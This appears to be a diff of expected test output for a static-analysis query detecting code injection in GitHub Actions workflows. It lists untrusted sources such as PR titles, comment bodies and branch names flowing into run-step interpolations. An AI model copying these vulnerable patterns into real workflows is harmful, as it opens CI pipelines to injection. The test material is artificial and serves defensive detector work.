-| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml |
-| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml |
-| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml |
-| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | .github/workflows/simple2.yml |
-| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml |
-| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml |
-| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | .github/workflows/slash_command2.yml |
-| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | .github/workflows/test1.yml |
-| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml |
-| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml |
-| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | .github/workflows/test3.yml |
-| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml |
-| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml |
-| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml |
-| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | .github/workflows/test5.yml |
-| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml |
-| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml |
-| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml |
-| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml |
-| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml |
-| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml |
-| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml |
-| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml |
-| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml |
-| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml |
-| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | .github/workflows/test11.yml |
-| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | .github/workflows/test12.yml |
-| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml |
-| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml |
-| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml |
-| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml |
-| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml |
-| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml |
-| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml |
-| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml |
-| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml |
-| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml |
-| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml |
-| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml |
-| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml |
-| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml |
-| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml |
-| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml |
-| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml |
-| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml |
-| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml |
-| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml |
-| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | .github/workflows/test18.yml |
-| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml |
-| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml |
-| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml |
-| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml |
-| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml |
-| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml |
-| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@).
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml |
-| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml |
-| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml |
-| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@).
